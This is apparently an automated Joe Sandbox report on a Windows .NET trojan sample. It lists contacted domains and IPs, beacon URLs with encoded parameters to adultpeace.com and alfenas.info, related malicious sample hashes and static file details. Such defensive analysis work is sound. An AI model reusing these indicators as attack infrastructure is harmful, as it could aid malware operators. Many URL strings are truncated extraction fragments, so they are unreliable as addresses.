          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.tiro.comc=0%Avira URL Cloudsafe
          http://www.fonts.comX0%URL Reputationsafe
          http://www.fonts.comX0%URL Reputationsafe
          http://www.fonts.comX0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/-czPgm0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/tgA0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.alfenas.info/p2io/?YdE=9rL05XJhqvsTNT&xJB=qSqSgno/BG4XQ9RzVLtR5zfvl4qKeuO7jrFeJ6D3vYZW0mQ/jO0gy2XM9tF7BGvyf3dv100%Avira URL Cloudmalware
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.adultpeace.com/p2io/?YdE=9rL05XJhqvsTNT&xJB=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sajatypeworks.comd0%URL Reputationsafe
          http://www.sajatypeworks.comd0%URL Reputationsafe
          http://www.sajatypeworks.comd0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.tiro.comc0%URL Reputationsafe
          http://www.tiro.comc0%URL Reputationsafe
          http://www.tiro.comc0%URL Reputationsafe
          http://www.founder.com.cn/cn&0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnu-h0%Avira URL Cloudsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.founder.com.cn/cnb0%Avira URL Cloudsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe
          http://www.founder.com.cn/cnd0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          advancedaccessapplications.com
          34.98.99.30
          truetrue
            unknown
            adultpeace.com
            163.44.239.73
            truetrue
              unknown
              alfenas.info
              34.102.136.180
              truefalse
                unknown
                pixie.porkbun.com
                44.227.76.166
                truefalse
                  high
                  www.hiddenwholesale.com
                  unknown
                  unknowntrue
                    unknown
                    www.m678.xyz
                    unknown
                    unknowntrue
                      unknown
                      www.buylocalclub.info
                      unknown
                      unknowntrue
                        unknown
                        www.adultpeace.com
                        unknown
                        unknowntrue
                          unknown
                          www.alfenas.info
                          unknown
                          unknowntrue
                            unknown
                            www.advancedaccessapplications.com
                            unknown
                            unknowntrue
                              unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              www.adultpeace.com/p2io/true
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              low
                              http://www.alfenas.info/p2io/?YdE=9rL05XJhqvsTNT&xJB=qSqSgno/BG4XQ9RzVLtR5zfvl4qKeuO7jrFeJ6D3vYZW0mQ/jO0gy2XM9tF7BGvyf3dvfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://www.adultpeace.com/p2io/?YdE=9rL05XJhqvsTNT&xJB=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjWtrue
                              • Avira URL Cloud: safe
                              unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.carterandcone.comuLQxVf0A9SFT.exe, 00000000.00000003.237514448.0000000006250000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                high
                                http://www.fontbureau.comexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.tiro.comcom4QxVf0A9SFT.exe, 00000000.00000003.234922559.000000000625B000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.com/designers/?explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bTheexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.jiyu-kobo.co.jp/7gQxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.fontbureau.com/designers?explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.tiro.com4QxVf0A9SFT.exe, 00000000.00000003.234871936.000000000625B000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.tiro.comexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/SeguridadDS.xsdQxVf0A9SFT.exefalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com/designersexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/VerdMgHQxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.goodfont.co.krexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/jp/QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.tiro.comc=QxVf0A9SFT.exe, 00000000.00000003.234871936.000000000625B000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.fonts.comXQxVf0A9SFT.exe, 00000000.00000003.234412924.000000000625E000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.carterandcone.comlexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.jiyu-kobo.co.jp/-czPgmQxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.sajatypeworks.comQxVf0A9SFT.exe, 00000000.00000003.233768270.000000000625E000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.typography.netDexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.founder.com.cn/cn/cTheexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.jiyu-kobo.co.jp/jp/tgAQxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://fontfabrik.comexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.founder.com.cn/cnQxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.jiyu-kobo.co.jp/QxVf0A9SFT.exe, 00000000.00000003.238487110.0000000006244000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers8explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.fonts.comQxVf0A9SFT.exe, 00000000.00000003.234445179.000000000625B000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.sandoll.co.krQxVf0A9SFT.exe, 00000000.00000003.235729383.0000000006249000.00000004.00000001.sdmp, explorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.sajatypeworks.comdQxVf0A9SFT.exe, 00000000.00000003.233768270.000000000625E000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.urwpp.deDPleaseexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.fontbureau.com/designers:QxVf0A9SFT.exe, 00000000.00000003.242529960.000000000624D000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.zhongyicts.com.cnexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.tiro.comcQxVf0A9SFT.exe, 00000000.00000003.234787437.000000000625B000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cn&QxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.founder.com.cn/cnu-hQxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sakkal.comexplorer.exe, 00000014.00000000.332484999.000000000BC30000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.founder.com.cn/cnbQxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.founder.com.cn/cndQxVf0A9SFT.exe, 00000000.00000003.236776997.000000000627D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    34.102.136.180
                                                    alfenas.infoUnited States
                                                    15169GOOGLEUSfalse
                                                    163.44.239.73
                                                    adultpeace.comJapan7506INTERQGMOInternetIncJPtrue

                                                    General Information

                                                    Joe Sandbox Version:33.0.0 White Diamond
                                                    Analysis ID:452671
                                                    Start date:22.07.2021
                                                    Start time:17:45:07
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 11m 3s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:QxVf0A9SFT (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:30
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@7/1@6/2
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 37.5% (good quality ratio 33.3%)
                                                    • Quality average: 72.5%
                                                    • Quality standard deviation: 32.3%
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, svchost.exe
                                                    • Excluded IPs from analysis (whitelisted): 131.253.33.200, 13.107.22.200, 93.184.220.29, 20.82.210.154, 52.255.188.83, 92.122.145.220, 13.64.90.137, 168.61.161.212, 23.35.236.56, 40.112.88.60, 173.222.108.241, 173.222.108.219, 173.222.108.243, 80.67.82.104, 80.67.82.81, 20.50.102.62
                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    17:46:33API Interceptor1x Sleep call for process: QxVf0A9SFT.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    163.44.239.73Tlz3P6ra10.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?xXk8kx=Bxltd27xbtZdOP20&B6eTzpeH=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6hexLg8JEjAkVm64g==
                                                    ZQGMiyaTir.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?_0GL=KlDtj2THDpk4&C4t8=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW
                                                    kXkTaGocR5.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?-Z0dqT=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW&6l-DO=iR-PKD00knl4
                                                    heoN5wnP2d.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?9rT0=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NOt68HOxKR&l2M=0pZ4_
                                                    eTWZtFRRMJ.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?X48P0=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NOt68HOxKR&NJ=6lvHNFHx
                                                    FORM_C__.EXEGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?g4bXpniX=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&2dox=1bTx
                                                    Payment copy_MT103_9847.exeGet hashmaliciousBrowse
                                                    • www.bbptimes.com/p6nu/?5jYLcPK=ZI3MMCwwW/BV/afxqGKZQfQUWIyKPxlpFz0nCvBmz/Y4y5woIUYuT9T71ozNNgOkDEhp&X8mhB2=5jkpX2b8GHg
                                                    1itFWK1W1z.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?6lvt=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&uXU=St-HtfY8
                                                    lTAPQJikGw.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?CFQHg=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&Pr980v=G2MtWNVHS
                                                    LkvumUsaQX.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?7ntDA=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6hexLg8JEjAkVm64g==&p48x=MN6xDxf80FMxbj4
                                                    FORM C1.xlsxGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?lljDp=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&4h=wZutZX1pT2
                                                    qXDtb88hht.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?Z8E=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NOt68HOxKR&b0GDi6=Q6Ahtfox
                                                    FORM B.xlsxGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?9r=4hGhubGX5Ne8OP9p&zv7Dz=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==
                                                    17jLieeOPx.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?D48=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&2dYX6=1b-D6VYx
                                                    Compliance - Request for Courtesy Call -.xlsxGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?vzr=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&0b=7nm4TjipE4K
                                                    U4JZ8cQqvU.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?6lyPdB=iR-deNZP3&z8I4HhO=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR
                                                    6dTTv9IdCw.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?G0Dp=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6hexLg8JEjAkVm64g==&vPqT4=6lnLSRg0
                                                    QyKNw7NioL.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?aBd=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW&m4=PditjTvx4PwX_x-
                                                    Request for Courtesy Call - Urgent.xlsxGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?NFNpHvU=4oufm6g8t9Bugn+4kDBWoA8I6Q2bNaX51teMhl/6i5f1woTl8Y4OhcGguchYpq40FyXh9g==&Bv-=b8utZ
                                                    wMKDi0Ss3f.exeGet hashmaliciousBrowse
                                                    • www.adultpeace.com/p2io/?4hfHN=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it5NkyKMHKzCR&y4=2doLnT

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    INTERQGMOInternetIncJPSecuriteInfo.com.Variant.Graftor.981190.24096.exeGet hashmaliciousBrowse
                                                    • 133.130.104.18
                                                    PO20210719.docxGet hashmaliciousBrowse
                                                    • 157.7.107.89
                                                    F63V4i8eZU.exeGet hashmaliciousBrowse
                                                    • 133.130.104.18
                                                    Y-20211907-00927735_pdf.exeGet hashmaliciousBrowse
                                                    • 118.27.99.20
                                                    kung.xlsxGet hashmaliciousBrowse
                                                    • 163.44.185.218
                                                    Tlz3P6ra10.exeGet hashmaliciousBrowse
                                                    • 163.44.239.73
                                                    LcpQGVWUWU.exeGet hashmaliciousBrowse
                                                    • 163.44.185.221
                                                    01_extracted.exeGet hashmaliciousBrowse
                                                    • 150.95.255.38
                                                    Order_1537-25.exeGet hashmaliciousBrowse
                                                    • 150.95.255.38
                                                    Enquiry#List For Urgent Order070421.exeGet hashmaliciousBrowse
                                                    • 118.27.99.88
                                                    New Order062421.exeGet hashmaliciousBrowse
                                                    • 150.95.255.38
                                                    ZQGMiyaTir.exeGet hashmaliciousBrowse
                                                    • 163.44.239.73
                                                    Shipping Document DHL.exeGet hashmaliciousBrowse
                                                    • 150.95.255.38
                                                    xwKdahKPn8.exeGet hashmaliciousBrowse
                                                    • 210.172.144.245
                                                    kXkTaGocR5.exeGet hashmaliciousBrowse
                                                    • 163.44.239.73
                                                    heoN5wnP2d.exeGet hashmaliciousBrowse
                                                    • 163.44.239.73
                                                    New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                    • 118.27.99.88
                                                    Potvrda o uplati u eurima.exeGet hashmaliciousBrowse
                                                    • 163.44.187.215
                                                    June 21st,2021.exeGet hashmaliciousBrowse
                                                    • 157.7.107.169
                                                    eTWZtFRRMJ.exeGet hashmaliciousBrowse
                                                    • 163.44.239.73

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QxVf0A9SFT.exe.log
                                                    Process:C:\Users\user\Desktop\QxVf0A9SFT.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1594
                                                    Entropy (8bit):5.336334182031907
                                                    Encrypted:false
                                                    SSDEEP:48:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHKzvFHsAmHK2HKSHKKHKs:lrq5qXEwCYqhQnoPtIxHeqzNM/q2qSqY
                                                    MD5:B9E8D9BC061D6715808BB3A28CECBA2B
                                                    SHA1:6F18CD63C12AEC962D089F215658FD5BE1789BC3
                                                    SHA-256:716E082F23E093EBCA2C8F994745CC7D62457D7359BBE555B75E275CE8EEEDC7
                                                    SHA-512:6D97D3E34CBCC5C0CCF845E285F98DE1824A825AB1D306D20ED164B0B74270CED9AB694E40831EC796E9F823BB4E369166006E555D7BBD000A33A0FDA601F806
                                                    Malicious:true
                                                    Reputation:moderate, very likely benign file
                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.282964777274327
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                    • Win32 Executable (generic) a (10002005/4) 49.75%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Windows Screen Saver (13104/52) 0.07%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    File name:QxVf0A9SFT.exe
                                                    File size:926720
                                                    MD5:04ea3fcf816b22f98adf5267204615f0
                                                    SHA1:06a21e2a043f00a4f1f364975b3de139f8f508f3
                                                    SHA256:62269dc86f9f29aeeeb4966505408fccefef782f08334def058cdca5884b9c4b
                                                    SHA512:794d733261068fc8eed6cb0e146e00b273170ca4a0ad966be35747eae22a08a7b59337d7cba3615d6c9ca48bab4e028bb55d0c2cacdca1ad2328bbca73ccd97f
                                                    SSDEEP:12288:pots2HgpLzKjH6/9oyvUIZbVEjNiHMZDj61xUqp/6LUV8Tj6L5niPE0dEysGU:WgpLOovDBK4sDmjUqNk6C2Ld6E0VsGU
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#.`..............P.............f6... ...@....@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4e3666
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
